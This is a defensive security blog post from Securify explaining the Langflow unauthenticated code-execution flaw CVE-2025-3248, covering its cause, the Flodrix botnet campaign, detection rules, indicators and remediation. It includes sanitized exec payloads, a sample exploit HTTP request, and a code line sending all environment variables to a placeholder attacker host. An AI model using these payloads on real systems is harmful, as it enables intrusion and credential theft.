Langflow RCE Vulnerability: Unauthenticated Code Execution Explained

Securify

May 14, 2026

1. Context: Why an AI Orchestration Tool Is a High-Value Target

Langflow isn’t a toy. It’s the platform engineering teams reach for when they need to wire together LLM calls, retrieval pipelines, agents, and data sources without writing everything from scratch. With over 79,000 GitHub stars and DataStax-backed commercial support, it has quietly become infrastructure — the kind that runs in internal dev environments, staging clusters, and increasingly, production.

That’s the threat model here. We’re not talking about a niche tool used by a handful of developers. We’re talking about something that sits inside cloud environments alongside API keys, model credentials, database connections, and customer data pipelines. When attackers start targeting Langflow, they’re not just after the server — they’re after everything it’s connected to.

The vulnerability itself is textbook in the worst possible way: an API endpoint that was designed for a legitimate purpose, left unauthenticated, and made to execute arbitrary Python code. The fact that this sat unfixed for nearly two years after the first public disclosure is a story worth understanding.

2. The Vulnerability, Precisely

2.1 The Endpoint

The culprit is /api/v1/validate/code — a FastAPI endpoint in Langflow’s backend, built to validate Python code snippets that users write for custom components. The design intent was fine. The execution was not.

In versions prior to 1.3.0, this endpoint required zero authentication. You didn’t need a session token, an API key, or anything else. You could hit it from curl with a JSON body and Langflow would execute your code on the server.

2.2 How Python Burned Them: The exec() Problem

The root cause lives in how Langflow’s validate_code() function processes input. It takes user-supplied code, runs it through Python’s ast.parse() to construct an Abstract Syntax Tree, then compiles and executes it via exec(). The problem is that Python evaluates certain AST constructs — specifically decorator expressions and function default argument values — at parse/compile time, not at call time.

That distinction is everything. Consider what happens when Python compiles this:

# This is what a malicious payload looks like at the structural level

# (sanitized — actual commands redacted)

# Vector 1: Decorator-based execution

@exec(‘import os; os.system(“<command>”)’)

def foo():

pass

# Vector 2: Default argument execution

def bar(x=exec(‘import subprocess; subprocess.check_output(“<cmd>”)’)):

pass

# Both execute their payloads the moment Python parses the function definition.

# The exec() call in validate_code() triggers it — no further interaction needed.

The server’s own logs show a 200 OK — the endpoint returns a JSON response about validation errors — while the injected command has already fired. The response looks benign. The damage is done.

2.3 The Missing Authentication — Two Years of Open Door

The first public disclosure of this class of vulnerability appeared in July 2023, when a GitHub user opened Issue #696 identifying that the unauthenticated code-validation endpoint could be exploited via default parameter injection. It took until November 2024 for a pull request to address it — and that attempt was abandoned because the fix would have broken existing features. The actual patch didn’t land until March 2025, nearly two years after initial discovery.

The patch itself is straightforward. Langflow added authentication dependency injection to the endpoint handler:

# BEFORE (vulnerable — no auth parameter)

@router.post(‘/validate/code’)

async def post_validate_code(data: CodeValidationRequest):

return validate_code(data.code)

# AFTER (patched — auth enforced via FastAPI dependency injection)

@router.post(‘/validate/code’)

async def post_validate_code(

data: CodeValidationRequest,

_current_user: CurrentActiveUser # <– FastAPI injects this, blocks unauth requests

return validate_code(data.code)

One parameter. That’s the difference between two years of unauthenticated code execution and a protected endpoint. This is also why the CVSS score is 9.8 — not just because RCE is severe, but because the attack complexity is near-zero. Any attacker with network access can exploit this with a single HTTP request.

3. Request-Level Proof: What the Attack Actually Looks Like

For defenders building detection logic or validating whether an exposed instance was targeted, this is what exploitation traffic looks like at the HTTP layer:

POST /api/v1/validate/code HTTP/1.1

Host: <target-langflow-host>:7860

Content-Type: application/json

User-Agent: Mozilla/5.0

{

“code”: “@exec(\”with open(‘/tmp/rce_test’,’w’) as f: f.write(‘pwned’)\”)”,

“frontend_node”: {}

}

The server responds with a standard JSON body:

HTTP/1.1 200 OK

Content-Type: application/json

{“imports”: {“errors”: []}, “function”: {“errors”: []}}

The response looks like a successful validation. In reality, the file /tmp/rce_test now exists on the server with attacker-controlled content. That same pattern — inject code, receive a clean 200, observe server-side effects — is the foundation of the Flodrix botnet campaign documented by Trend Micro.

🔍 What Reconnaissance Looked LikeThreat actors identified vulnerable targets using Shodan and FOFA, searching for Langflow instances exposed on port 7860 (default). At the time CISA added the CVE to KEV in May 2025, Censys showed 466 internet-exposed instances. Recorded Future observed 1,050 on Shodan. GreyNoise tracked 361+ unique malicious IPs actively probing this endpoint across the US, Australia, Singapore, Germany, and Mexico.

4. From RCE to Botnet: The Flodrix Campaign

Most CVE write-ups stop at the technical flaw. The Flodrix campaign is worth understanding because it shows what the full attack chain looks like once an attacker has RCE on a Langflow host.

4.1 Attack Sequence

Stage	Attacker Action	Technique
1 — Reconnaissance	Mass-scan for port 7860 using Shodan/FOFA	OSINT / Internet scanning
2 — Initial Access	POST malicious payload to /api/v1/validate/code	Unauthenticated RCE (CVE-2025-3248)
3 — Execution	Run bash downloader script named ‘docker’	Command execution via exec()
4 — Payload Delivery	Fetch Flodrix ELF binary targeting host architecture	Remote downloader from C2: 80.66.75.121
5 — Persistence	Execute Flodrix, connect to C2 over TCP	LeetHozer variant with DDoS capability
6 — Post-Exploitation	Enumerate system, exfiltrate env vars, await DDoS commands	Recon + C2 communication
7 — Stealth	Self-deletion, artifact removal, string obfuscation	Anti-forensics

A few things stand out about this campaign. First, the attacker hosted multiple downloader variants on the same C2 host, suggesting active development and parallel campaigns. Second, the malware architecture targets multiple CPU architectures — meaning these were automated deployments, not manual infections. Third, the self-deletion behavior means many compromised hosts may not retain evidence of the initial infection.

The Flodrix payload itself is an evolved variant of LeetHozer, a botnet family documented by Qihoo 360 in 2020. The 2025 version adds new DDoS attack types, additional C2 configuration options, and improved obfuscation. This isn’t an opportunistic script kiddie campaign — it’s organized infrastructure being extended to target the AI tooling ecosystem.

4.2 Why Langflow Hosts Are Attractive Targets

Langflow instances don’t just run code — they run code in environments that are typically provisioned with significant cloud permissions, API keys, and database credentials. Consider what a typical Langflow deployment has access to:

LLM API keys (OpenAI, Anthropic, Azure OpenAI, Google Vertex)
Vector database credentials (Pinecone, Weaviate, Chroma, pgvector)
External data source connections (S3 buckets, RDS, Elasticsearch)
Internal network access within the VPC or private subnet
Environment variables that developers casually store sensitive config in

An attacker who gets RCE on a Langflow host in a typical AWS environment can potentially pivot to the instance metadata service, grab IAM role credentials, and begin moving laterally within the account. The botnet use case is almost the lesser concern.

5. The Architectural Failures That Led Here

Beyond the specific code bug, this vulnerability is a case study in how AI tooling gets built and deployed without the security discipline that production infrastructure deserves. These aren’t hypothetical risks — they’re patterns that security teams see regularly in engagements.

5.1 Internet Exposure by Default

Langflow listens on port 7860 by default when deployed with the standard Docker instructions. There is nothing in the default configuration that prevents direct internet exposure. Developers spin up a Docker container, open the port to test something, and then either forget about it or underestimate the risk. Five hundred internet-exposed instances suggests this is not a theoretical concern.

5.2 The “It’s Internal” Assumption

When the original issue was raised in 2023, the implicit assumption was that Langflow was an internal developer tool — not something that would face the public internet. That assumption didn’t survive contact with how software actually gets deployed. Developer tools have a persistent tendency to drift toward exposure, especially in cloud environments where security groups and network policies are managed separately from application configuration.

5.3 Credential Sprawl in AI Pipelines

AI orchestration platforms like Langflow are magnets for credentials. Developers store API keys, database passwords, and cloud credentials in flow configurations, environment variables, and secrets files — often without the same rigor applied to application secrets management. An attacker with RCE on a Langflow host can enumerate environment variables in seconds:

# An attacker can exfiltrate all environment variables in a single request

# by embedding this in a validation payload:

import os, subprocess

subprocess.run([‘curl’, ‘-X’, ‘POST’, ‘https://<attacker-c2>/env’,

‘–data’, str(dict(os.environ))], capture_output=True)

5.4 The Two-Year Disclosure Gap

The vulnerability was first reported in July 2023. It wasn’t patched until March 2025. That’s not an unusual timeline for open-source projects under active development, but it underscores a genuine risk management problem. If your organization depends on open-source AI tooling, you need a process for tracking CVEs against your dependency inventory — not just for your language packages, but for the platforms and orchestration layers you’re running.

6. Detection: What to Look For

If you’re running Langflow or have run it historically, these are the signals that matter. The goal is to determine both whether you were targeted and whether a compromise occurred.

6.1 Log Signatures

# Nginx / load balancer — flag POST requests to this endpoint from external IPs

grep ‘POST /api/v1/validate/code’ /var/log/nginx/access.log | \

awk ‘{print $1, $7, $9}’ | sort | uniq -c | sort -rn

# Look specifically for:

# – POST requests from IPs not in your org’s expected ranges

# – High-frequency requests (scanning behavior)

# – Requests with unusual payload sizes

# Application log correlation

tail -f /var/log/langflow/app.log | grep -E ‘(validate/code|exec|subprocess)’

6.2 YARA / Network Detection

rule CVE_2025_3248_Langflow_RCE_Attempt {

meta:

description = “Detects CVE-2025-3248 exploitation attempts against Langflow”

severity = “CRITICAL”

cve = “CVE-2025-3248”

strings:

$api_path = “/api/v1/validate/code”

$exec_call = “exec(“

$subprocess = “subprocess”

$os_system = “os.system”

$decorator = “@exec”

condition:

$api_path and (any of ($exec_call, $subprocess, $os_system, $decorator))

}

6.3 Indicators of Compromise — Flodrix Campaign

Indicator	Type	Context
80.66.75.121	IP Address	Flodrix C2 / downloader host (Trend Micro)
/tmp/e1x	File Path	Flodrix ELF binary staging location
Upgrading Kernel..	String	Flodrix health check output string
docker (script)	Filename	Bash downloader script name used in campaign
POST /api/v1/validate/code with exec/subprocess in body	HTTP Pattern	Exploitation attempt signature

7. Remediation — Tiered by Urgency

🚨 If You’re Running Langflow < 1.3.0 Right NowUpgrade to Langflow 1.3.0 or later immediately. If you cannot upgrade within hours, take the service offline or block all inbound access to port 7860 at the network layer. Do not leave a vulnerable instance running with public or semi-public access. This is not a vulnerability you can partially mitigate — it’s a single HTTP request from a full server compromise.

7.1 Immediate (< 24 Hours)

Upgrade to Langflow 1.3.0+ — this is the definitive fix
Audit all Langflow deployments across cloud accounts, dev, staging, and production
Search Shodan/Censys for your IP ranges — determine if any instances are publicly exposed
Review access logs for POST requests to /api/v1/validate/code from unexpected sources
Rotate all credentials accessible from the Langflow host environment

7.2 Short-Term (< 1 Week)

Place Langflow behind SSO or an authenticated reverse proxy if exposing externally
Deploy to an isolated VPC or subnet with no route to sensitive internal resources
Implement WAF rules to detect and block requests matching exploitation patterns
Add runtime monitoring to detect unusual child process spawning from the Langflow process
Restrict outbound network from Langflow hosts — legitimate use cases rarely need arbitrary outbound TCP

7.3 Structural (Ongoing)

Inventory all open-source AI tooling in your environment and track CVEs against it
Treat AI orchestration platforms with the same exposure controls as your API gateway
Implement secrets management — no credentials in environment variables or flow configs
Adopt a policy that developer AI tools require security review before production deployment

7.4 Network-Level Mitigation (If Patch Is Delayed)

# Block /api/v1/validate/code from external IPs — nginx example

location /api/v1/validate/code {

allow 10.0.0.0/8; # Internal only

allow 172.16.0.0/12;

allow 192.168.0.0/16;

deny all;

}

# AWS Security Group — restrict port 7860 to internal CIDRs only

# Never expose 7860 to 0.0.0.0/0

8. Compliance Relevance

For teams managing SOC 2, ISO 27001, or HIPAA environments, this isn’t just a patch ticket — it has audit implications.

Framework	Relevant Control	How CVE-2025-3248 Creates Exposure
SOC 2 Type II	CC6.1, CC6.6 — Logical Access Controls	Unauthenticated RCE directly violates logical access controls; if exploited, auditors will ask about detection timelines and incident response
ISO 27001:2022	A.8.25 — Secure development lifecycle	2-year patch gap reflects inadequate vendor risk monitoring; organizations must demonstrate compensating controls if tooling has known open CVEs
HIPAA Security Rule	§164.312(a)(1) — Access Control	If Langflow has access to PHI systems or PHI-adjacent pipelines, unauthenticated RCE is a reportable incident trigger; not a vulnerability you can quietly patch
NIST CSF 2.0	PR.AC, DE.CM, RS.RP	Exposure maps to Protect, Detect, and Respond functions; document remediation timelines for audit evidence
PCI DSS v4.0	Req 6.3 — Security vulnerabilities	CVSS 9.8 with CISA KEV status means this requires documented prioritization; ideally patched within 30 days per policy

The practical compliance risk is this: if you have a documented patch management policy and a 9.8 CVE sits unpatched in your environment for more than 30 days, you now have a policy exception that needs to be documented, justified, and remediated. Auditors don’t just want to see the patch — they want to see that your process detected it and responded.

9. The Broader Signal: AI Tooling Is the New Attack Surface

CVE-2025-3248 is not an isolated incident. It’s part of a pattern that security teams need to start treating as a category, not a one-off. AI orchestration frameworks — Langflow, LangChain, LlamaIndex, Flowise, CrewAI — are being adopted faster than they can be secured. They combine two things that attract attackers: high-value credentials and direct code execution.

In 2025 alone, CISA has added Langflow twice to the KEV catalog — once for CVE-2025-3248, and again in early 2026 for a subsequent code injection flaw (CVE-2026-33017) that was weaponized within 20 hours of disclosure. The advisory-to-exploit window is collapsing. The old assumption that you have days or weeks to patch a new CVE does not hold for this class of tooling.

Engineering leaders and security teams need to build the same posture for AI infrastructure that they’ve built for their web applications and APIs: asset inventory, exposure monitoring, authenticated access, network segmentation, and a defined patch SLA for critical CVEs. The fact that Langflow is a developer productivity tool doesn’t make it less dangerous than an internet-facing API. In many environments, it’s more dangerous — because it runs with more trust and more access.

Conclusion

CVE-2025-3248 is a straightforward vulnerability with serious real-world consequences. An unauthenticated HTTP endpoint that calls exec() on user input is not a subtle design flaw — it’s a fundamental access control failure that sat open for nearly two years. The fact that it was actively exploited to deploy botnet infrastructure confirms that attackers are paying close attention to the AI tooling stack.

The path forward is clear: patch immediately, restrict network exposure, rotate any credentials that were accessible from affected hosts, and build the operational processes to catch the next one faster. AI tooling deserves the same security rigor as any production infrastructure — because in most environments, that’s exactly what it is.

Concerned about AI tooling exposure in your environment?

Securify AI LLC provides vCISO services and security assessments specifically designed for cloud-native, AI-driven environments. If you’re unsure whether your Langflow deployment is patched, whether similar tooling in your stack carries comparable risk, or how to structure a response program for emerging AI infrastructure CVEs — we can help.